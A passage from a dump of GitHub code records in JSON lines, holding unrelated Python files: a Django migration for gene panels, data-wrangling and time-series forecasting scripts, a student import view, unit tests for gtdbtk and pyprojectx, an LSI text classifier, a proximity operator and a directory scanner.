pseudoautosomal\",\n ),\n (\n \"BOTH monoallelic and biallelic (but BIALLELIC mutations cause a more SEVERE disease form), autosomal or pseudoautosomal\",\n \"BOTH monoallelic and biallelic (but BIALLELIC mutations cause a more SEVERE disease form), autosomal or pseudoautosomal\",\n ),\n (\n \"X-LINKED: hemizygous mutation in males, biallelic mutations in females\",\n \"X-LINKED: hemizygous mutation in males, biallelic mutations in females\",\n ),\n (\n \"X-LINKED: hemizygous mutation in males, monoallelic mutations in females may cause disease (may be less severe, later onset than males)\",\n \"X-LINKED: hemizygous mutation in males, monoallelic mutations in females may cause disease (may be less severe, later onset than males)\",\n ),\n (\"MITOCHONDRIAL\", \"MITOCHONDRIAL\"),\n (\"Unknown\", \"Unknown\"),\n (\n \"Other - please specifiy in evaluation comments\",\n \"Other - please specifiy in evaluation comments\",\n ),\n ],\n max_length=255,\n verbose_name=\"Mode of inheritance\",\n ),\n ),\n (\n \"penetrance\",\n models.CharField(\n blank=True,\n choices=[\n (\"unknown\", \"unknown\"),\n (\"Complete\", \"Complete\"),\n (\"Incomplete\", \"Incomplete\"),\n ],\n max_length=255,\n null=True,\n ),\n ),\n (\n \"publications\",\n django.contrib.postgres.fields.ArrayField(\n base_field=models.TextField(), blank=True, null=True, size=None\n ),\n ),\n (\n \"phenotypes\",\n django.contrib.postgres.fields.ArrayField(\n base_field=models.TextField(), blank=True, null=True, size=None\n ),\n ),\n (\"flagged\", models.BooleanField(default=False)),\n (\"ready\", models.BooleanField(default=False)),\n (\n \"mode_of_pathogenicity\",\n models.CharField(\n blank=True,\n choices=[\n (\"\", \"Provide exceptions to loss-of-function\"),\n (\n \"Loss-of-function variants (as defined in pop up message) DO NOT cause this phenotype - please provide details in the comments\",\n \"Loss-of-function variants (as defined in pop up message) DO NOT cause this phenotype - please provide details in the comments\",\n ),\n (\n \"Other - please provide details in the comments\",\n \"Other - please provide details in the comments\",\n ),\n ],\n max_length=255,\n null=True,\n ),\n ),\n (\"saved_gel_status\", models.IntegerField(db_index=True, null=True)),\n (\"comments\", models.ManyToManyField(to=\"panels.Comment\")),\n (\n \"evaluation\",\n models.ManyToManyField(db_index=True, to=\"panels.Evaluation\"),\n ),\n (\"evidence\", models.ManyToManyField(to=\"panels.Evidence\")),\n (\n \"gene_core\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\"panels.Gene\"\n ),\n ),\n (\n \"panel\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n to=\"panels.GenePanelSnapshot\",\n ),\n ),\n (\"tags\", models.ManyToManyField(to=\"panels.Tag\")),\n (\"track\", models.ManyToManyField(to=\"panels.TrackRecord\")),\n ],\n options={\"get_latest_by\": \"created\", \"ordering\": [\"-saved_gel_status\"]},\n bases=(panels.models.entity.AbstractEntity, models.Model),\n ),\n migrations.AddIndex(\n model_name=\"str\",\n index=models.Index(\n fields=[\"panel_id\"], name=\"panels_str_panel_i_68b388_idx\"\n ),\n ),\n migrations.AddIndex(\n model_name=\"str\",\n index=models.Index(\n fields=[\"gene_core_id\"], name=\"panels_str_gene_co_bad503_idx\"\n ),\n ),\n ]\n","repo_name":"genomicsengland/panelapp","sub_path":"panelapp/panels/migrations/0037_auto_20180213_1323.py","file_name":"0037_auto_20180213_1323.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"8101247928","text":"import pandas as pd\n\nimport acquisition1 as aq\n\npreciotungsteno=aq.tungsten_timeseries\npreciotungsteno.drop(['success','timeseries', 'start_date','end_date', 'base'], axis=1, inplace=True)\npreciotungsteno.index.name='Date'\npreciotungsteno=preciotungsteno.rates.apply(pd.Series)\npreciotungsteno.drop('USD', axis=1, inplace=True)\npreciotungsteno['Tungsten Price']= (1/preciotungsteno['TUNGSTEN'])*32151\npreciotungsteno.drop('TUNGSTEN',axis=1, inplace=True)\npreciotungsteno.to_csv('tungsten_daily_price.csv')","repo_name":"DiegoMerello/Final-Project-Ironhack","sub_path":"wrangling.py","file_name":"wrangling.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30732470784","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('perrin-freres-monthly-champagne-.csv')\n\ndf.info()\n\ndf.isnull().sum()\ndf.dropna(inplace=True)\n\n#cleaning up the data\ndf.columns=['Month','Sales']\ndf.set_index('Month', inplace=True)\n\ndf.describe()\n\nplt.plot(df['Sales'].tail(50))\nplt.show()\n\n##Testing for stationarity\n\nfrom statsmodels.tsa.stattools import adfuller\n\ndef adfuller_test(sales):\n result=adfuller(sales)\n print( \"p-value \"+str(result[1]))\n\nadfuller_test(df['Sales'])\n\n\ndf['First diff'] = pd.Series.diff(df.Sales,periods=1)\ndf['seasonal diff']= pd.Series.diff(df['First diff'],periods=12)\nplt.plot(df['seasonal diff'])\nplt.show()\n\nadfuller_test(df['seasonal diff'].dropna()) #p-value 0.0002650462849293356 hence rejecting the NUll Hypothesis and concluding the time seriese is Stationary\n\n\nfrom statsmodels.graphics.tsaplots import plot_acf,plot_pacf\n\nfig = plt.figure(figsize=(12,8))\nax1 = fig.add_subplot(211)\nfig = plot_acf(df['seasonal diff'].iloc[13:],lags=40,ax=ax1)\nax2 = fig.add_subplot(212)\nfig = plot_pacf(df['seasonal diff'].iloc[13:],lags=40,ax=ax2)\nplt.show()\n\n##From ACF and PACF graph (p=2, d=1, q=1) ans S(p=1,d=12,q=1)\nimport statsmodels.api as sm\n\n#model= sm.tsa.statespace.SARIMAX(df.Sales,order=(2,1,1), seasonal_order=(1,1,1,12))\nresults=model.fit()\nresults.summary()\n\npred = results.get_prediction(start=90,end=115,dynamic=False)\n\nax=df.Sales.plot(label='Observed')\npred.predicted_mean.plot(ax=ax,label='Forecast',alphs=.7)\n\n","repo_name":"sanu-shaw/TimeSeriesLearn1","sub_path":"Time_series_analysis_SARIMAX.py","file_name":"Time_series_analysis_SARIMAX.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31528821074","text":"import pandas as pd\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom apps.school.models import Classroom, Grade, Section\nfrom apps.student.models import Student\n\n\n# Create your views here.\nclass GenerateQrView(TemplateView):\n template_name = 'student/generate_qr.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n students = Student.objects.all()\n classrooms = Classroom.objects.all()\n\n context['students'] = students\n context['classrooms'] = classrooms\n\n return context\n\n\ndef import_xlsx(request):\n if request.method == 'POST':\n file = request.FILES['archivo_excel']\n if file.name.endswith('.xlsx'):\n df = pd.read_excel(file)\n for index, row in df.iterrows():\n dni = row['dni']\n first_name = row['first_name']\n last_name = row['last_name']\n grade = row['grade']\n section = row['section']\n\n grade_obj = Grade.objects.get(short_name=grade)\n section_obj = Section.objects.get(short_name=section)\n\n classroom_obj = Classroom.objects.get(grade=grade_obj, section=section_obj)\n student_obj = Student(\n dni=dni,\n first_name=first_name,\n last_name=last_name,\n classroom=classroom_obj\n )\n student_obj.save()\n return HttpResponse('Datos importados exitosamente.')\n else:\n return HttpResponse('El archivo debe estar en formato Excel (.xlsx).')\n return render(request, 'student/import_xlsx.html')","repo_name":"YLlampi/school-assistance","sub_path":"apps/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14108717417","text":"import pandas as pd\nfrom statistics import median\nfrom sys import argv\n\nif __name__ == '__main__':\n input_file = argv[1]\n file_tf_output = argv[2]\n project_tf_output = argv[3]\n raw_data = pd.read_csv(input_file)\n\n raw_dict = {}\n tf_dict = {}\n for row in raw_data.values:\n projectID = row[0]\n file = row[3]\n changes = row[4] + row[5]\n\n try:\n raw_dict[projectID][file].append(changes)\n except KeyError:\n try:\n raw_dict[projectID][file] = [changes]\n tf_dict[projectID][file] = 0\n except KeyError:\n raw_dict[projectID] = {file: [changes]}\n tf_dict[projectID] = {file: 0}\n\n for project in raw_dict.keys():\n for filename in raw_dict[project].keys():\n changelist = raw_dict[project][filename]\n raw_dict[project][filename] = (sum(changelist), sorted(changelist))\n\n truck_factor = 1\n while truck_factor < 100:\n for project in raw_dict.keys():\n for filename in raw_dict[project].keys():\n total_changes, changelist = raw_dict[project][filename]\n if len(changelist) > 0:\n biggest_change = changelist.pop()\n if total_changes == 0:\n changes_left = 0\n else:\n changes_left = sum(changelist) / total_changes\n if changes_left < .5:\n tf_dict[project][filename] = truck_factor\n raw_dict[project][filename] = (total_changes, [])\n truck_factor += 1\n\n proj_tf_dict = {}\n with open(file_tf_output, 'w') as output_file:\n print(\"project,file,factor\", file=output_file)\n for proj, p_dict in tf_dict.items():\n tf_list = []\n for file, tf in p_dict.items():\n tf_list.append(tf)\n print(proj + \",\" + file + \",\" + str(tf), file=output_file)\n proj_tf_dict[proj] = median(tf_list)\n\n with open(project_tf_output, 'w') as output_file:\n print(\"project,factor\", file=output_file)\n for project, tf in proj_tf_dict.items():\n print(project + \",\" + str(tf), file=output_file)\n\n\n","repo_name":"tylernickr/EDS19","sub_path":"04-truck-factor/truck_factor.py","file_name":"truck_factor.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10034728467","text":"###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see . #\r\n# #\r\n###############################################################################\r\n\r\nimport unittest\r\n\r\n\r\nimport gtdbtk\r\nfrom gtdbtk import tools\r\n\r\n\r\nclass TestTools(unittest.TestCase):\r\n\r\n def test_add_ncbi_prefix(self):\r\n refname = 'GCF_123.1'\r\n self.assertEqual(tools.add_ncbi_prefix(refname), 'RS_GCF_123.1')\r\n refname = 'GCA_456.1'\r\n self.assertEqual(tools.add_ncbi_prefix(refname), 'GB_GCA_456.1')\r\n\r\n def test_splitchunks(self):\r\n test_dict = {'k1': 'v1', 'k2': 'v2',\r\n 'k3': 'v3', 'k4': 'v4'}\r\n my_gen = tools.splitchunks(test_dict, 2)\r\n self.assertEqual(len(next(my_gen)), 2)\r\n\r\n def test_splitchunks_list(self):\r\n test_list = [1, 2, 3, 4, 5, 6]\r\n my_gen = tools.splitchunks_list(test_list, 2)\r\n self.assertEqual(len(next(my_gen)), 3)\r\n\r\n def test_generateTempTableName(self):\r\n self.assertEqual(len(tools.generateTempTableName()), 24)\r\n\r\n def test_merge_two_dicts(self):\r\n a = {'k1': 'v1', 'k2': 'v2'}\r\n b = {'k3': 'v3', 'k4': 'v4'}\r\n join_dict = tools.merge_two_dicts(a, b)\r\n self.assertIn('k1', join_dict)\r\n self.assertIn('k3', join_dict)\r\n self.assertEqual(len(join_dict), 4)\r\n\r\n def test_sha256(self):\r\n file = 'gtdbtk/tests/data/genomes/genome_1.fna'\r\n self.assertEqual(tools.sha256(\r\n file), '64a8a537d4d964366d7eecefc7cb806f82db5544')\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"TJrogers86/GTDBTk","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"28868228158","text":"def dec_to_base_n(x, n):\n val = []\n power = 1\n while power < x:\n power *= n\n power //= n;\n while x > 0:\n digit = x // power\n val.append(digit)\n x -= digit * power\n power //= 7\n return val\n\ndef summation(n):\n return (n * (n + 1)) // 2\n\nrows = 1000000000\nmod = 7\nval = dec_to_base_n(rows, mod)\npowers = [1 for x in range(len(val))]\nfor i in range(len(powers) - 2, -1, -1):\n powers[i] = powers[i + 1] * summation(mod)\n\nresult = 0\nmultiplier = 1\nfor i, e in enumerate(val):\n x = multiplier * powers[i] * summation(e)\n result += x\n if e != 0:\n multiplier *= e + 1\nprint(result)\n","repo_name":"g-d-l/project_euler","sub_path":"done/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41420881750","text":"#!/usr/local/bin/python\n\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"--px\", help=\"This is the pixsize of the tomogram\",type=float)\nparser.add_argument(\"--F\", help=\"The desired freq you want to the tomogram filter to.\",type=float)\n\nargs=parser.parse_args()\n\npixsize=args.px\nnyq_freq=float(0.5)\nfreq=args.F\nreso=float(pixsize * freq * nyq_freq**-1)\n\nprint(reso)\n","repo_name":"shahpnmlab/cryoEM-Python","sub_path":"freq2ang.py","file_name":"freq2ang.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2854168832","text":"from pathlib import Path\n\nimport pytest\n\nfrom pyprojectx.config import Config\n\n\ndef test_no_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test-no-config.toml\"))\n assert config.get_tool_requirements(\"tool\") == {\"requirements\": [], \"post-install\": None}\n assert not config.is_tool(\"tool\")\n assert config.get_alias(\"alias\") == []\n\n\ndef test_no_tool_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test-no-tool-config.toml\"))\n assert config.get_alias(\"run\") == [(None, \"run command\")]\n with pytest.raises(\n Warning, match=r\"Invalid alias wrong-tool-alias: 'wrong-tool' is not defined in \\[tool.pyprojectx\\]\"\n ):\n config.get_alias(\"wrong-tool-alias\")\n\n\ndef test_tool_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n\n assert config.is_tool(\"tool-1\")\n assert config.get_tool_requirements(\"tool-1\") == {\"requirements\": [\"req1\", \"req2\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-2\")\n assert config.get_tool_requirements(\"tool-2\") == {\"requirements\": [\"tool2 requirement\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-3\")\n assert config.get_tool_requirements(\"tool-3\") == {\"requirements\": [\"req1\", \"req2\", \"req3\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-4\")\n assert config.get_tool_requirements(\"tool-4\") == {\"requirements\": [\"tool-4-req1\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-5\")\n assert config.get_tool_requirements(\"tool-5\") == {\n \"requirements\": [\"tool-5-req1\", \"tool-5-req2\"],\n \"post-install\": \"tool-5 && pw@alias-1\",\n }\n\n assert not config.is_tool(\"nope\")\n assert config.get_tool_requirements(\"nope\") == {\"requirements\": [], \"post-install\": None}\n\n\ndef test_alias_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"alias-1\") == [(\"tool-1\", \"tool-1 arg\")]\n assert config.get_alias(\"alias-2\") == [(\"tool-2\", \"tool-2 arg1 arg2\")]\n assert config.get_alias(\"alias-3\") == [(\"tool-1\", \"command arg\")]\n assert config.get_alias(\"alias-4\") == [(\"tool-2\", \"command --default @arg:x\")]\n assert config.get_alias(\"combined-alias\") == [(None, \"pw@alias-1 && pw@alias-2 pw@shell-command\")]\n assert config.get_alias(\"alias-list\") == [(None, \"pw@alias-1\"), (None, \"pw@alias-2\"), (None, \"pw@shell-command\")]\n assert config.get_alias(\"shell-command\") == [(None, \"ls -al\")]\n assert config.get_alias(\"backward-compatible-tool-ref\") == [(\"tool-1\", \"command arg\")]\n\n\ndef test_os_specific_alias_config(mocker):\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"os-specific\") == [(None, \"cmd\")]\n\n mocker.patch(\"sys.platform\", \"my-os\")\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"os-specific\") == [(None, \"my-os-cmd\")]\n\n\ndef test_invalid_toml():\n with pytest.raises(Warning, match=r\".+invalid.toml: Illegal character\"):\n Config(Path(__file__).parent.with_name(\"data\").joinpath(\"invalid.toml\"))\n\n\ndef test_unexisting_toml():\n with pytest.raises(Warning, match=r\"No such file or directory\"):\n Config(Path(__file__).parent.with_name(\"data\").joinpath(\"unexisting.toml\"))\n\n\n@pytest.mark.parametrize(\n (\"shorcut\", \"aliases\"),\n [\n (\"aaa-bbb-ccc\", [\"aaa-bbb-ccc\"]),\n (\"aaaBbbDdd\", [\"aaaBbbDdd\"]),\n (\"b123-c123-d123\", [\"b123-c123-d123\"]),\n (\"c123D123\", [\"c123D123\"]),\n (\"d123-E123\", [\"d123-E123\"]),\n (\"aBC\", [\"aaa-bbb-ccc\"]),\n (\"aaBbCc\", [\"aaa-bbb-ccc\"]),\n (\"e\", []),\n (\"aC\", []),\n (\"A\", []),\n (\"E\", [\"E\"]),\n (\"a\", [\"aaa-bbb-ccc\", \"aaaBbbDdd\"]),\n (\"aB\", [\"aaa-bbb-ccc\", \"aaaBbbDdd\"]),\n (\"b\", [\"b123-c123-d123\"]),\n (\"bCD\", [\"b123-c123-d123\"]),\n (\"c1D1\", [\"c123D123\"]),\n (\"dE\", [\"d123-E123\"]),\n ],\n)\ndef test_find_aliases(shorcut, aliases):\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"alias-abbreviations.toml\"))\n assert config.find_aliases(shorcut) == aliases\n","repo_name":"pyprojectx/pyprojectx","sub_path":"tests/unit/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"955214599","text":"import pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom gensim import models, matutils\nfrom .base import BaseEstimator\n\n\nclass LsiEstimator(BaseEstimator):\n def __init__(self):\n super().__init__()\n self.hidden_size = 500\n self.lr_solver = 'newton-cg'\n self.lr_max_iter = 10000\n self.lr_multi_class = 'ovr'\n self.lsi_filename = \"/lsi\"\n self.lr_filename = \"/lr.pickle\"\n\n def train(self, options=None):\n if self.adapter is None:\n raise \"please set adapter before training\"\n adapter = self.adapter\n\n lsi = self.__make_lsi(adapter)\n x_train = self.__make_x(lsi, adapter.be_train)\n y_train = self.__make_y(adapter.ot_train)\n x_test = self.__make_x(lsi, adapter.be_test)\n y_test = self.__make_y(adapter.ot_test)\n meta_test = self.__make_meta(adapter.meta_test)\n\n print(\"Train samples: \", len(x_train))\n print(\"Validation samples: \", len(x_test))\n\n lr = LogisticRegression(solver=self.lr_solver,\n max_iter=self.lr_max_iter,\n multi_class=self.lr_multi_class)\n lr.fit(X=x_train, y=y_train)\n self.lsi = lsi\n self.lr = lr\n\n print(\"Train :\", lr.score(X=x_train, y=y_train))\n print(\"Validation :\", lr.score(X=x_test, y=y_test))\n\n print('Validation Acuracy',\n self.calc_accuracy(x_test, y_test, meta_test))\n\n def predict(self):\n be_infer = self.adapter.get_bow_element_vectors()\n x_infer = self.__make_x(self.lsi, be_infer)\n topic_id = self.predict_x(x_infer[0])\n return self.all_topics[topic_id]\n\n # not supported\n def predict_with_prob_vec(self):\n return None\n\n def predict_x(self, x):\n return self.lr.predict([x])[0]\n\n # not supported\n def predict_x_with_prob_vec(self, x):\n return None\n\n def load_model(self, path):\n self.lsi = models.LsiModel.load(path + self.lsi_filename)\n with open(path + self.lr_filename, \"rb\") as f:\n self.lr = pickle.load(f)\n\n def save_model(self, path):\n self.lsi.save(path + self.lsi_filename)\n with open(path + self.lr_filename, \"wb\") as f:\n pickle.dump(self.lr, f)\n\n def __make_lsi(self, adapter):\n raw_corpus = []\n for x in adapter.be_train:\n raw_corpus.extend(matutils.Dense2Corpus(x.T))\n lsi = models.LsiModel(raw_corpus,\n id2word=adapter.dictionary,\n num_topics=self.hidden_size)\n return lsi\n\n def __make_x(self, lsi, vecs):\n corpus = []\n for x in vecs:\n corpus.extend(matutils.Dense2Corpus(x.T))\n x = []\n for vec in lsi[corpus]:\n x.append(self.__sparse_to_dense(vec))\n return x\n\n def __make_y(self, vecs):\n flatten_vecs = []\n for x in vecs:\n flatten_vecs.extend(x)\n return [v.argmax() for v in flatten_vecs]\n\n def __make_meta(self, vecs):\n flatten_vecs = []\n for x in vecs:\n flatten_vecs.extend(x)\n return flatten_vecs\n\n def __sparse_to_dense(self, vec):\n ret = [0 for e in range(self.hidden_size)]\n for v in vec:\n ret[v[0]] = v[1]\n return ret\n","repo_name":"toshiya/semantic_selector","sub_path":"projects/semantic_selector/estimator/lsi.py","file_name":"lsi.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"25206524839","text":"\"\"\"\r\nVersion : 1.0 ( 06-22-2022).\r\n\r\nDEPENDENCIES:\r\n -'newton.py' in the folder 'utils'\r\n -'lambert_W.py' in the folder 'utils'\r\n\r\nAuthor : Mbaye Diongue\r\n\r\nCopyright (C) 2022\r\n\r\nThis file is part of the codes provided at http://proximity-operator.net\r\n\r\nBy downloading and/or using any of these files, you implicitly agree to\r\nall the terms of the license CeCill-B (available online).\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom proxop.utils.newton import newton_\r\nfrom proxop.utils.lambert_W import lambert_W\r\n\r\n\r\nclass Jeffrey:\r\n r\"\"\"Compute the proximity operator and the evaluation of gamma*D.\r\n\r\n Where D is the function defined as:\r\n\r\n\r\n / (x-y) * log(x/y) if x > 0 and y > 0\r\n D(x,y) = | 0 if x=y=0\r\n \\ + inf otherwise\r\n\r\n 'gamma' is the scale factor\r\n\r\n When the inputs are arrays, the outputs are computed element-wise\r\n INPUTS\r\n ========\r\n x - scalar or ND array\r\n y - scalar or ND array with the same size as 'x'\r\n gamma - scalar or ND array compatible with the blocks of 'y' [default: gamma=1]\r\n \"\"\"\r\n\r\n def __init__(self, gamma: float or np.ndarray = 1):\r\n if np.any(gamma <= 0):\r\n raise Exception(\"'gamma' must be strictly positive\")\r\n self.gamma = gamma\r\n\r\n def prox(self, x: np.ndarray, y: np.ndarray) -> [np.ndarray, np.ndarray]:\r\n scale = self.gamma\r\n\r\n if np.size(x) != np.size(y):\r\n raise Exception(\"'x' and 'y' must have the same size\")\r\n # scalar-like inputs handling\r\n if np.size(x) <= 1:\r\n x = np.reshape(x, (-1))\r\n if np.size(y) <= 1:\r\n y = np.reshape(y, (-1))\r\n\r\n # 2nd branch\r\n sz = np.shape(x)\r\n prox_p = np.zeros(sz)\r\n prox_q = np.zeros(sz)\r\n\r\n # branch selection\r\n # when the input is too big, we use a taylor approximation of the\r\n # LambertW function to avoid divergence\r\n u1 = 1 - x / scale\r\n u2 = 1 - y / scale\r\n lw_x, lw_y = np.zeros(sz), np.zeros(sz)\r\n # With x ...\r\n mask_u = u1 > 100\r\n lw_x[mask_u] = u1[mask_u] - u1[mask_u] / (1 + u1[mask_u]) * np.log(u1[mask_u])\r\n\r\n # we use the Lambert_W function otherwise\r\n mask_u = np.logical_not(mask_u)\r\n lw_x[mask_u] = lambert_W(np.exp(1 - x / scale))\r\n # With y ...\r\n mask_u = u2 > 100\r\n lw_y[mask_u] = u2[mask_u] - u2[mask_u] / (1 + u2[mask_u]) * np.log(u2[mask_u])\r\n\r\n # we use the Lambert_W function otherwise\r\n mask_u = np.logical_not(mask_u)\r\n lw_y[mask_u] = lambert_W(np.exp(1 - y / scale))\r\n\r\n mask = lw_x * lw_y < 1\r\n gg = scale\r\n if np.size(scale) > 1:\r\n gg = scale[mask]\r\n xx = x[mask]\r\n yy = y[mask]\r\n # newton's method\r\n\r\n def fun_phi(t):\r\n return (\r\n (t + 1) * np.log(t) - 1 / t + t**2 + (xx / gg - 1) * t + 1 - yy / gg\r\n )\r\n\r\n def der_fun_phi(t):\r\n return np.log(t) + 1 / t + 1 / t**2 + 2 * t + xx / gg\r\n\r\n # root finding\r\n eps = 1e-10\r\n low = lw_x + eps\r\n high = 1 / (lw_y + eps)\r\n t = (low + high) / 2\r\n t = newton_(fun_phi, fp=der_fun_phi, x0=t, low=low, high=high)\r\n\r\n # 1st branch\r\n prox_p[mask] = xx + gg * (np.log(t) + t - 1)\r\n prox_q[mask] = yy - gg * (np.log(t) - 1 / t + 1)\r\n\r\n return [prox_p, prox_q]\r\n\r\n def __call__(self, x: np.ndarray, y: np.ndarray) -> float:\r\n if np.size(x) != np.size(y):\r\n raise Exception(\"'x' and 'y' must have the same size\")\r\n if (\r\n np.any(x < 0)\r\n or np.any(y < 0)\r\n or np.any((x == 0) * (y != 0))\r\n or np.any((y == 0) * (x != 0))\r\n ):\r\n return np.inf\r\n if np.size(x) <= 1:\r\n x = np.reshape(x, (-1))\r\n y = np.reshape(y, (-1))\r\n mask = y > 0\r\n res = (x[mask] - y[mask]) * np.log(x[mask] / y[mask])\r\n gg = self.gamma\r\n if np.size(gg) > 1:\r\n gg = gg[mask]\r\n return np.sum(gg * res)\r\n\r\n def _check(self, x):\r\n if (np.size(self.gamma) > 1 and np.size(self.gamma) != np.size(x)):\r\n ValueError(\r\n \"'gamma' must be positive scalars or positive ND arrays\" +\r\n \" with the same size as 'x'\"\r\n )","repo_name":"mbayediongue/proxop","sub_path":"src/proxop/multi/Jeffrey.py","file_name":"Jeffrey.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19646329899","text":"import os\nfrom functools import reduce\nfrom pathlib import Path\nfrom datetime import datetime\nimport json\nfrom collections import namedtuple\n\n\ndef get_directory_structure(rootdir):\n \"\"\"\n Creates a nested dictionary that represents the folder structure of rootdir\n \"\"\"\n TOP_LEVEL_NAME = 'root'\n rootdir = Path(rootdir).resolve()\n start = len(str(rootdir))\n res = {\n 'INFO': {\n 'rootdir': str(rootdir),\n 'timestamp': datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"),\n 'time': datetime.timestamp(datetime.now()),\n 'version': 'v1',\n },\n TOP_LEVEL_NAME: {},\n }\n for path, dirs, files in os.walk(rootdir):\n folders = path[start:].split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n subdir = dict.fromkeys(files)\n parent = reduce(dict.get, folders[:-1], res)\n parent[folders[-1]] = subdir\n return res\n\n_wrap_entry = namedtuple( 'DirEntryWrapper', 'isLeafDir name size mtime' )\ndef _myscantree( rootdir, follow_links=False, reldir='' ):\n visited = set()\n rootdir = os.path.normpath(rootdir)\n try:\n current_scan_count = 0\n with os.scandir(rootdir) as it:\n for entry in it:\n current_scan_count += 1\n if entry.is_dir():\n if not entry.is_symlink() or follow_links:\n absdir = os.path.relpath(entry.path, rootdir)\n if absdir in visited: \n continue \n else: \n visited.add(absdir)\n yield from _myscantree( entry.path, follow_links, os.path.join(reldir,entry.name) )\n else:\n try:\n st = entry.stat()\n size = st.st_size\n mtime = st.st_mtime\n except FileNotFoundError: # strange bug, $RECYCLE.BIN\\\\...\n print('FileNotFoundError', entry.path)\n size = -1\n mtime = 0\n yield _wrap_entry( \n False,\n os.path.join(reldir,entry.name), \n # entry.is_symlink(),\n size,\n mtime,\n )\n if current_scan_count == 0: # fix bug where empty folders are not included\n yield _wrap_entry( \n True,\n reldir, \n # entry.is_symlink(),\n 0,\n 0,\n )\n except PermissionError:\n print('PermissionError', rootdir)\n pass\n # for path, dirs, files in os.walk(rootdir):\n # for name in files:\n # yield _wrap_entry( \n # os.path.join(reldir,name), \n # # entry.is_symlink(),\n # os.stat(os.path.join(path,name)).st_size,\n # os.stat(os.path.join(path,name)).st_mtime,\n # )\n # for name in dirs:\n # yield from _myscantree( os.path.join(path,name), follow_links, os.path.join(reldir,name) )\n\nclass _NestedDict(dict):\n def __missing__(self, key):\n self[key] = _NestedDict()\n return self[key]\n\ndef get_directory_structure_v2(rootdir):\n \"\"\"\n Creates a nested dictionary that represents the folder structure of rootdir\n \"\"\"\n TOP_LEVEL_NAME = 'root'\n rootdir = Path(rootdir).resolve()\n res = _NestedDict()\n res[\"INFO\"] = {\n 'rootdir': str(rootdir),\n 'timestamp': datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"),\n 'time': datetime.timestamp(datetime.now()),\n 'version': 'v2',\n }\n for item in _myscantree(rootdir): # returns individual files or empty directories\n if item.isLeafDir: # directory that is empty needs special treatment\n folders = item.name.split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n parent = reduce(lambda d, k: d[k], folders[:-1], res) # get the parent folder by recursive dict.get for all folders until leaf\n parent[folders[-1]] = {}\n continue\n mtime = datetime.fromtimestamp(item.mtime).strftime(\"%y/%m/%d %H:%M:%S\")\n folders = item.name.split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n parent = reduce(lambda d, k: d[k], folders[:-1], res) # get the parent folder by recursive dict.get for all folders until leaf\n parent[folders[-1]] = json.dumps((item.size, mtime))\n return res\n\nclass Node:\n def __init__(self, name, old_path=None, new_path=None, parent=None, compare_settings={}):\n assert old_path is not None or new_path is not None, 'both paths are None'\n self.name = name\n self.parent = parent\n self.children: list[Node] = []\n self.old_path = old_path\n 